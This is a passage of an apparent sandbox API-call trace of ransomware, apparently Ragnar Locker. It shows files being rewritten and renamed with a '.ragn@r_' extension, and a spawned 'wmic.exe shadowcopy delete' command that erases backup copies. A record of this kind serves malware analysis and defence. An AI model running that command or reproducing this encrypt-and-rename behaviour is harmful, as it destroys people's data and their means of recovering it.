lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf.ragn@r_B8CF767A" [0177.324] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 232 os_tid = 0x1174 [0177.154] GetNamedSecurityInfoW () returned 0x0 [0177.319] SetEntriesInAclW () returned 0x0 [0177.319] SetNamedSecurityInfoW () returned 0x0 [0177.326] LocalFree (hMem=0x358ee28) returned 0x0 [0177.326] LocalFree (hMem=0x358ee3c) returned 0x358ee3c [0177.326] LocalFree (hMem=0x5d4ff20) returned 0x0 [0177.326] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml")) returned 0x20 [0177.327] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x370 [0177.327] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x5f3f880 | out: lpFileSize=0x5f3f880*=60684) returned 1 [0177.327] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0xecfd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.327] GetProcessHeap () returned 0x3520000 [0177.327] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x35819b8 [0177.327] ReadFile (in: hFile=0x370, lpBuffer=0x35819b8, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5f3f838, lpOverlapped=0x0 | out: lpBuffer=0x35819b8*, lpNumberOfBytesRead=0x5f3f838*=0xf, lpOverlapped=0x0) returned 1 [0177.330] VirtualAlloc (lpAddress=0x0, dwSize=0xed0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0177.330] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.330] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5f3f854 | out: lpNewFilePointer=0x0) returned 1 [0177.330] ReadFile (in: hFile=0x370, lpBuffer=0x2f70000, nNumberOfBytesToRead=0xed0c, lpNumberOfBytesRead=0x5f3f828, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5f3f828*=0xed0c, lpOverlapped=0x0) returned 1 [0177.335] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5f3f82c | out: lpNewFilePointer=0x0) returned 1 [0177.336] LockFile (hFile=0x370, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xed0c, nNumberOfBytesToLockHigh=0x0) returned 1 [0177.336] WriteFile (in: hFile=0x370, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0xed0c, lpNumberOfBytesWritten=0x5f3f824, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5f3f824*=0xed0c, lpOverlapped=0x0) returned 1 [0177.336] UnlockFile (hFile=0x370, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xed0c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0177.336] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0177.337] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0xed0c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.337] LockFile (hFile=0x370, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0177.337] WriteFile (in: hFile=0x370, lpBuffer=0x361339c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5f3f864, lpOverlapped=0x0 | out: lpBuffer=0x361339c*, lpNumberOfBytesWritten=0x5f3f864*=0x100, lpOverlapped=0x0) returned 1 [0177.337] WriteFile (in: hFile=0x370, lpBuffer=0x361349c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5f3f864, lpOverlapped=0x0 | out: lpBuffer=0x361349c*, lpNumberOfBytesWritten=0x5f3f864*=0x100, lpOverlapped=0x0) returned 1 [0177.337] WriteFile (in: hFile=0x370, lpBuffer=0x5f3f868*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5f3f864, lpOverlapped=0x0 | out: lpBuffer=0x5f3f868*, lpNumberOfBytesWritten=0x5f3f864*=0xf, lpOverlapped=0x0) returned 1 [0177.337] UnlockFile (hFile=0x370, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0177.337] GetProcessHeap () returned 0x3520000 [0177.337] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x35819b8 | out: hHeap=0x3520000) returned 1 [0177.337] CloseHandle (hObject=0x370) returned 1 [0177.340] lstrcpyW (in: lpString1=0x5f3f3d4, lpString2="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" [0177.340] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.ragn@r_B8CF767A" [0177.340] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 233 os_tid = 0x428 [0177.882] GetNamedSecurityInfoW () returned 0x0 [0177.882] SetEntriesInAclW () returned 0x0 [0177.882] SetNamedSecurityInfoW () returned 0x0 [0177.883] LocalFree (hMem=0x361c350) returned 0x0 [0177.883] LocalFree (hMem=0x361c364) returned 0x361c364 [0177.883] LocalFree (hMem=0x358e950) returned 0x0 [0177.883] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf")) returned 0x20 [0177.883] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3b8 [0177.883] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x5affe2c | out: lpFileSize=0x5affe2c*=4015) returned 1 [0177.883] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0xfa0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.884] GetProcessHeap () returned 0x3520000 [0177.884] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3582528 [0177.884] ReadFile (in: hFile=0x3b8, lpBuffer=0x3582528, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5affde4, lpOverlapped=0x0 | out: lpBuffer=0x3582528*, lpNumberOfBytesRead=0x5affde4*=0xf, lpOverlapped=0x0) returned 1 [0177.886] VirtualAlloc (lpAddress=0x0, dwSize=0xfaf, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0177.886] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.886] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affe00 | out: lpNewFilePointer=0x0) returned 1 [0177.886] ReadFile (in: hFile=0x3b8, lpBuffer=0x2f70000, nNumberOfBytesToRead=0xfaf, lpNumberOfBytesRead=0x5affdd4, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5affdd4*=0xfaf, lpOverlapped=0x0) returned 1 [0177.887] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affdd8 | out: lpNewFilePointer=0x0) returned 1 [0177.887] LockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xfaf, nNumberOfBytesToLockHigh=0x0) returned 1 [0177.887] WriteFile (in: hFile=0x3b8, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0xfaf, lpNumberOfBytesWritten=0x5affdd0, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5affdd0*=0xfaf, lpOverlapped=0x0) returned 1 [0177.887] UnlockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xfaf, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0177.887] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0177.887] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0xfaf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.888] LockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0177.888] WriteFile (in: hFile=0x3b8, lpBuffer=0x361339c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affe10, lpOverlapped=0x0 | out: lpBuffer=0x361339c*, lpNumberOfBytesWritten=0x5affe10*=0x100, lpOverlapped=0x0) returned 1 [0177.888] WriteFile (in: hFile=0x3b8, lpBuffer=0x361349c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affe10, lpOverlapped=0x0 | out: lpBuffer=0x361349c*, lpNumberOfBytesWritten=0x5affe10*=0x100, lpOverlapped=0x0) returned 1 [0177.888] WriteFile (in: hFile=0x3b8, lpBuffer=0x5affe14*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5affe10, lpOverlapped=0x0 | out: lpBuffer=0x5affe14*, lpNumberOfBytesWritten=0x5affe10*=0xf, lpOverlapped=0x0) returned 1 [0177.888] UnlockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0177.888] GetProcessHeap () returned 0x3520000 [0177.888] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3582528 | out: hHeap=0x3520000) returned 1 [0177.888] CloseHandle (hObject=0x3b8) returned 1 [0177.889] lstrcpyW (in: lpString1=0x5aff980, lpString2="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf" [0177.890] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf.ragn@r_B8CF767A" [0177.890] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 235 os_tid = 0xf3c [0177.993] GetNamedSecurityInfoW () returned 0x0 [0177.994] SetEntriesInAclW () returned 0x0 [0177.994] SetNamedSecurityInfoW () returned 0x0 [0177.995] LocalFree (hMem=0x358ee18) returned 0x0 [0177.995] LocalFree (hMem=0x358ee2c) returned 0x358ee2c [0177.995] LocalFree (hMem=0x5d4ff20) returned 0x0 [0177.995] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml")) returned 0x20 [0177.995] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x370 [0177.995] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x5aff860 | out: lpFileSize=0x5aff860*=80254) returned 1 [0177.995] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x1396f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.995] GetProcessHeap () returned 0x3520000 [0177.995] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3582528 [0177.995] ReadFile (in: hFile=0x370, lpBuffer=0x3582528, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5aff818, lpOverlapped=0x0 | out: lpBuffer=0x3582528*, lpNumberOfBytesRead=0x5aff818*=0xf, lpOverlapped=0x0) returned 1 [0177.997] VirtualAlloc (lpAddress=0x0, dwSize=0x1397e, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0177.997] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.997] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5aff834 | out: lpNewFilePointer=0x0) returned 1 [0177.997] ReadFile (in: hFile=0x370, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x1397e, lpNumberOfBytesRead=0x5aff808, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5aff808*=0x1397e, lpOverlapped=0x0) returned 1 [0178.004] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5aff80c | out: lpNewFilePointer=0x0) returned 1 [0178.005] LockFile (hFile=0x370, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1397e, nNumberOfBytesToLockHigh=0x0) returned 1 [0178.005] WriteFile (in: hFile=0x370, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x1397e, lpNumberOfBytesWritten=0x5aff804, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5aff804*=0x1397e, lpOverlapped=0x0) returned 1 [0178.005] UnlockFile (hFile=0x370, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1397e, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0178.005] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.006] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x1397e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.006] LockFile (hFile=0x370, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0178.006] WriteFile (in: hFile=0x370, lpBuffer=0x5d1cfbc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5aff844, lpOverlapped=0x0 | out: lpBuffer=0x5d1cfbc*, lpNumberOfBytesWritten=0x5aff844*=0x100, lpOverlapped=0x0) returned 1 [0178.006] WriteFile (in: hFile=0x370, lpBuffer=0x5d1d0bc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5aff844, lpOverlapped=0x0 | out: lpBuffer=0x5d1d0bc*, lpNumberOfBytesWritten=0x5aff844*=0x100, lpOverlapped=0x0) returned 1 [0178.006] WriteFile (in: hFile=0x370, lpBuffer=0x5aff848*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5aff844, lpOverlapped=0x0 | out: lpBuffer=0x5aff848*, lpNumberOfBytesWritten=0x5aff844*=0xf, lpOverlapped=0x0) returned 1 [0178.007] UnlockFile (hFile=0x370, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0178.007] GetProcessHeap () returned 0x3520000 [0178.007] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3582528 | out: hHeap=0x3520000) returned 1 [0178.007] CloseHandle (hObject=0x370) returned 1 [0178.012] lstrcpyW (in: lpString1=0x5aff3b4, lpString2="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" [0178.012] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.ragn@r_B8CF767A" [0178.012] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Process: id = "2" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0xd039000" os_pid = "0x380" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x11dc" cmd_line = "wmic.exe shadowcopy delete" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 7 os_tid = 0x484 [0114.542] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff714090000 [0114.542] __set_app_type (_Type=0x1) [0114.542] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff7140cec40) returned 0x0 [0114.542] __wgetmainargs (in: _Argc=0x7ff7140f7258, _Argv=0x7ff7140f7260, _Env=0x7ff7140f7268, _DoWildCard=0, _StartInfo=0x7ff7140f7274 | out: _Argc=0x7ff7140f7258, _Argv=0x7ff7140f7260, _Env=0x7ff7140f7268) returned 0 [0114.545] ??0CHString@@QEAA@XZ () returned 0x7ff7140f79b0 [0114.547] malloc (_Size=0x30) returned 0x19ac75515a0 [0114.547] malloc (_Size=0x70) returned 0x19ac75515e0 [0114.547] malloc (_Size=0x50) returned 0x19ac7551660 [0114.547] malloc (_Size=0x30) returned 0x19ac75516c0 [0114.547] malloc (_Size=0x48) returned 0x19ac7551700 [0114.548] malloc (_Size=0x30) returned 0x19ac7556b30 [0114.548] malloc (_Size=0x30) returned 0x19ac7556b70 [0114.548] ??0CHString@@QEAA@XZ () returned 0x7ff7140f7e60 [0114.548] malloc (_Size=0x30) returned 0x19ac7556bb0 [0114.548] ?Empty@CHString@@QEAAXXZ () returned 0x7ffce127674c [0114.548] SetConsoleCtrlHandler (HandlerRoutine=0x7ff7140c7ca0, Add=1) returned 1 [0114.548] _onexit (_Func=0x7ff7140d91c0) returned 0x7ff7140d91c0 [0114.549] _onexit (_Func=0x7ff7140d92a0) returned 0x7ff7140d92a0 [0114.549] _onexit (_Func=0x7ff7140d92e0) returned 0x7ff7140d92e0 [0114.549] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0114.549] ResolveDelayLoadedAPI () returned 0x7ffce9f4efc0 [0114.549] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0114.557] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0120.390] CoCreateInstance (in: rclsid=0x7ff7140e0608*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ff7140e0618*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x7ff7140f7840 | out: ppv=0x7ff7140f7840*=0x19ac731c900) returned 0x0 [0122.172] GetCurrentProcess () returned 0xffffffffffffffff [0122.172] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x21a13ffc40 | out: TokenHandle=0x21a13ffc40*=0x160) returned 1 [0122.172] GetTokenInformation (in: TokenHandle=0x160, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x21a13ffc38 | out: TokenInformation=0x0, ReturnLength=0x21a13ffc38) returned 0 [0122.172] malloc (_Size=0x118) returned 0x19ac7555a40 [0122.172] GetTokenInformation (in: TokenHandle=0x160, TokenInformationClass=0x3, TokenInformation=0x19ac7555a40, TokenInformationLength=0x118, ReturnLength=0x21a13ffc38 | out: TokenInformation=0x19ac7555a40, ReturnLength=0x21a13ffc38) returned 1 [0122.172] AdjustTokenPrivileges (in: TokenHandle=0x160, DisableAllPrivileges=0, NewState=0x19ac7555a40*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=785469020, Attributes=0x1d78), (Luid.LowPart=0x19a, Luid.HighPart=-950724784, Attributes=0x19a), (Luid.LowPart=0x530045, Luid.HighPart=5177427, Attributes=0x5f0052), (Luid.LowPart=0x490056, Luid.HighPart=4784211, Attributes=0x4e004f), (Luid.LowPart=0x300035, Luid.HighPart=52, Attributes=0x720050), (Luid.LowPart=0x610072, Luid.HighPart=4456557, Attributes=0x740061))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0122.172] free (_Block=0x19ac7555a40) [0122.172] CloseHandle (hObject=0x160) returned 1 [0122.175] malloc (_Size=0x40) returned 0x19ac7555a40 [0122.176] malloc (_Size=0x40) returned 0x19ac7555a90 [0122.176] malloc (_Size=0x40) returned 0x19ac7555ae0 [0122.176] SetThreadUILanguage (LangId=0x0) returned 0x409 [0122.388] _vsnwprintf (in: _Buffer=0x19ac7555ae0, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x21a13ff948 | out: _Buffer="ms_409") returned 6 [0122.388] malloc (_Size=0x20) returned 0x19ac7551750 [0122.388] GetComputerNameW (in: lpBuffer=0x19ac7551750, nSize=0x21a13ffc48 | out: lpBuffer="NQDPDE", nSize=0x21a13ffc48) returned 1 [0122.388] lstrlenW (lpString="NQDPDE") returned 6 [0122.388] malloc (_Size=0xe) returned 0x19ac7555b30 [0122.388] lstrlenW (lpString="NQDPDE") returned 6 [0122.388] ResolveDelayLoadedAPI () returned 0x7ffce6726960 [0122.389] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x21a13ffc40 | out: lpNameBuffer=0x0, nSize=0x21a13ffc40) returned 0x0 [0122.394] GetLastError () returned 0xea [0122.394] malloc (_Size=0x1e) returned 0x19ac7555b50 [0122.394] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x19ac7555b50, nSize=0x21a13ffc40 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x21a13ffc40) returned 0x1 [0122.450] lstrlenW (lpString="") returned 0 [0122.450] lstrlenW (lpString="NQDPDE") returned 6 [0122.450] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0122.453] lstrlenW (lpString=".") returned 1 [0122.453] lstrlenW (lpString="NQDPDE") returned 6 [0122.453] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2=".", cchCount2=1) returned 3 [0122.453] lstrlenW (lpString="LOCALHOST") returned 9 [0122.453] lstrlenW (lpString="NQDPDE") returned 6 [0122.453] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="LOCALHOST", cchCount2=9) returned 3 [0122.453] lstrlenW (lpString="NQDPDE") returned 6 [0122.453] lstrlenW (lpString="NQDPDE") returned 6 [0122.453] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="NQDPDE", cchCount2=6) returned 2 [0122.453] free (_Block=0x19ac7555b30) [0122.453] lstrlenW (lpString="NQDPDE") returned 6 [0122.453] malloc (_Size=0xe) returned 0x19ac7555b30 [0122.453] lstrlenW (lpString="NQDPDE") returned 6 [0122.453] lstrlenW (lpString="NQDPDE") returned 6 [0122.453] malloc (_Size=0xe) returned 0x19ac7555b80 [0122.453] lstrlenW (lpString="NQDPDE") returned 6 [0122.454] malloc (_Size=0x8) returned 0x19ac7555ba0 [0122.454] malloc (_Size=0x18) returned 0x19ac7555bc0 [0122.454] ResolveDelayLoadedAPI () returned 0x7ffce7a3cdb0 [0122.474] malloc (_Size=0x30) returned 0x19ac7555be0 [0122.474] malloc (_Size=0x18) returned 0x19ac7555c20 [0122.474] SysStringLen (param_1="IDENTIFY") returned 0x8 [0122.474] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0122.474] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0122.474] SysStringLen (param_1="IDENTIFY") returned 0x8 [0122.474] malloc (_Size=0x30) returned 0x19ac7555c40 [0122.474] malloc (_Size=0x18) returned 0x19ac7555c80 [0122.475] SysStringLen 